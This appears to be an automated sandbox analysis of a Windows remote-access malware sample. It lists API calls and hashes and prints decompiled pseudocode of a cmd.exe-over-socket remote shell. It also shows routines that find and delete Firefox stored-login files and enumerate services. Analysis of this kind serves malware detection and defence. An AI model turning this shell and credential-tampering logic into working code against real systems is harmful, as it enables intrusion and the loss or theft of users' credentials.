                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                        • String ID:
                                        • API String ID: 2968164691-0
                                        • Opcode ID: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                        • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                        • Opcode Fuzzy Hash: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                        • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                         Uniqueness
                                         • Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E00402B8A(char _a4) {
                                        				char _v5;
                                        				char _v6;
                                        				char _v7;
                                        				char _v8;
                                        				char _v9;
                                        				void _v16;
                                        				signed int _v20;
                                        				long _v24;
                                        				long _v28;
                                        				void* _v44;
                                        				char _v60;
                                        				char _v76;
                                        				char* _t54;
                                        				int _t68;
                                        				void* _t79;
                                        				CHAR* _t80;
                                        				int _t91;
                                        				signed int _t120;
                                        				void* _t136;
                                        				CHAR* _t142;
                                        				void* _t146;
                                        
                                        				if(( *0x41b85c & 0x00000001) != 0) {
                                        					_t142 = 0;
                                        				} else {
                                        					 *0x41b85c =  *0x41b85c | 0x00000001;
                                        					_t142 = 0;
                                        					E00402010(0x41b800, 0);
                                        					E00413E72(E00402F89);
                                        				}
                                        				if(( *0x41b85c & 0x00000002) == 0) {
                                        					 *0x41b85c =  *0x41b85c | 0x00000002;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                        					E00413E72(E00402F7E);
                                        				}
                                        				_t50 =  &_v5;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t50);
                                        				_v20 = _v20 | 0xffffffff;
                                        				_v16 = _t142;
                                        				if( *0x41b888 != 0) {
                                        					L12:
                                        					_v24 = _t142;
                                        					PeekNamedPipe( *0x41b858, _t142, _t142, _t142,  &_v24, _t142);
                                        					if(_v24 <= _t142) {
                                        						_t146 = _t146 - 0x10;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v9);
                                        						_t54 = E004020C2(0x41b800, 0x62, 0x415664);
                                        						_v20 = _t54;
                                        					} else {
                                        						_t136 = malloc(_v24);
                                        						_t54 = ReadFile( *0x41b858, _t136, _v24,  &_v28, _t142);
                                        						if(_v28 > _t142) {
                                        							if(_v16 <= _t142) {
                                        								L18:
                                        								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v7);
                                        								_t146 = _t146 - 0x10;
                                        								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_t142, _v28,  &_v8);
                                        								_t54 = E004020C2(0x41b800, 0x62,  &_v76);
                                        								_v20 = _t54;
                                        							} else {
                                        								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        								_t68 = strncmp(_t136, _t54, _v16);
                                        								_t146 = _t146 + 0xc;
                                        								if(_t68 != 0) {
                                        									goto L18;
                                        								} else {
                                        									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v5);
                                        									_t146 = _t146 - 0x10;
                                        									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_v16, _v28 - _v16,  &_v6);
                                        									_t54 = E004020C2(0x41b800, 0x62,  &_v60);
                                        									_v20 = _t54;
                                        								}
                                        							}
                                        							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						}
                                        						free(_t136);
                                        					}
                                        					goto L22;
                                        				} else {
                                        					__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(0x41b860, "cmd.exe");
                                        					if(_t50 == 0) {
                                        						L11:
                                        						if( *0x41b888 != 0) {
                                        							do {
                                        								goto L12;
                                        								L22:
                                        								if(_v20 == 0xffffffff) {
                                        									 *0x41b889 =  *0x41b889 & 0x00000000;
                                        								}
                                        								__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        								if(_t54 <= 0) {
                                        									_v16 = _t142;
                                        								} else {
                                        									__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415770);
                                        									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(0x41b860);
                                        									__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        									WriteFile( *0x41b870,  &_v16,  &_v16,  &_v16, _t142);
                                        									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                        								}
                                        								Sleep(0x64);
                                        							} while ( *0x41b889 != 0);
                                        							TerminateProcess(0x41b878->hProcess, _t142);
                                        							CloseHandle( *0x41b87c);
                                        							_t50 = CloseHandle( *0x41b878);
                                        						}
                                        						E004020F4(_t50, 0x41b800);
                                        						CloseHandle( *0x41b858);
                                        						CloseHandle( *0x41b874);
                                        						 *0x41b888 =  *0x41b888 & 0x00000000;
                                        						_t91 = 1;
                                        					} else {
                                        						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(getenv("SystemDrive"));
                                        						__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415774);
                                        						0x41b7f0->nLength = 0xc;
                                        						 *0x41b7f8 = 1;
                                        						 *0x41b7f4 = _t142;
                                        						if(CreatePipe(0x41b7a0, 0x41b870, 0x41b7f0, _t142) == 0 || CreatePipe(0x41b858, 0x41b874, 0x41b7f0, _t142) == 0) {
                                        							_t91 = 0;
                                        						} else {
                                        							_t120 = 0x11;
                                        							memset(0x41b7a8, 0, _t120 << 2);
                                        							_t79 =  *0x41b7a0; // 0x0
                                        							 *0x41b7e0 = _t79;
                                        							_t80 =  *0x41b874; // 0x0
                                        							0x41b7a8->cb = 0x44;
                                        							 *0x41b7d4 = 0x101;
                                        							 *0x41b7d8 = _t142;
                                        							 *0x41b7e4 = _t80;
                                        							 *0x41b7e8 = _t80;
                                        							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        							 *0x41b888 = CreateProcessA(_t142, _t80, _t142, _t142, 1, _t142, _t142, _t80, 0x41b7a8, 0x41b878) & 0xffffff00 | _t81 != 0x00000000;
                                        							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
                                        							 *0x41b889 = 1;
                                        							E00402038(0x41b800);
                                        							asm("movsd");
                                        							asm("movsd");
                                        							asm("movsd");
                                        							asm("movsd");
                                        							E0040209B(0x41b800, 0x415664);
                                        							_t146 = _t146 + 0xc;
                                        							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        							_v20 = E004020C2(0x41b800, 0x93,  &_a4);
                                        							Sleep(0x12c);
                                        							_t142 = 0;
                                        							goto L11;
                                        						}
                                        					}
                                        				}
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _t91;
                                        			}

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                        • getenv.MSVCRT ref: 00402C34
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                        • CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                        • CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                        • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402D25
                                          • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • Sleep.KERNEL32(0000012C,00000093), ref: 00402D71
                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
                                        • malloc.MSVCRT ref: 00402DA9
                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402DDB
                                        • strncmp.MSVCRT(00000000,00000000), ref: 00402DE3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402DF8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402E15
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402E3B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402E52
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402E67
                                        • free.MSVCRT(00000000), ref: 00402E6E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00402E85
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402D57
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402EAB
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415770), ref: 00402EBC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0041B860), ref: 00402ECA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402ED7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402EE0
                                        • WriteFile.KERNEL32(00000000), ref: 00402EED
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402EFA
                                        • Sleep.KERNEL32(00000064), ref: 00402F07
                                        • TerminateProcess.KERNEL32(00000000), ref: 00402F21
                                        • CloseHandle.KERNEL32 ref: 00402F33
                                        • CloseHandle.KERNEL32 ref: 00402F3B
                                        • CloseHandle.KERNEL32 ref: 00402F52
                                        • CloseHandle.KERNEL32 ref: 00402F5A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F68
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F71
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                        • String ID: SystemDrive$cmd.exe
                                        • API String ID: 1882443052-3633465311
                                        • Opcode ID: b6a6d40c412da313f4d3738aa453d8cffe971ab7c1761651370b8d10dcb295f1
                                        • Instruction ID: 0121bb856768c0d2b30f6d73f3edf8f7852bc9241180a475d7ad49acf624a365
                                        • Opcode Fuzzy Hash: b6a6d40c412da313f4d3738aa453d8cffe971ab7c1761651370b8d10dcb295f1
                                        • Instruction Fuzzy Hash: 97B1A531A40209EFCB01AB61DD4DAEE7FB9EB84750F14803AF911A61E0CBB84945DBDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                        • getenv.MSVCRT ref: 004072D9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                        • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                          • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                          • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 3375041920-3681987949
                                        • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                        • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                        • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                        • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,0041B320), ref: 00411408
                                        • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410E95,?), ref: 00411438
                                        • GetLastError.KERNEL32 ref: 00411442
                                        • malloc.MSVCRT ref: 00411458
                                        • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410E95,?), ref: 00411477
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041149B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114A9
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114B5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114BE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114CA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 004114DB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114E8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114F4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114FD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411509
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041151A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                        • String ID:
                                        • API String ID: 2829549728-0
                                        • Opcode ID: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                        • Instruction ID: fe864d2e3db6e374d855c0a4c4208b99666831e449a430f346264da0072ddcf9
                                        • Opcode Fuzzy Hash: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                        • Instruction Fuzzy Hash: 5EA1E672C0051AEBCB15DBA0EC98EEEBB78FF58305F04806AF516A2160EB755A45CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                        • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                        • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
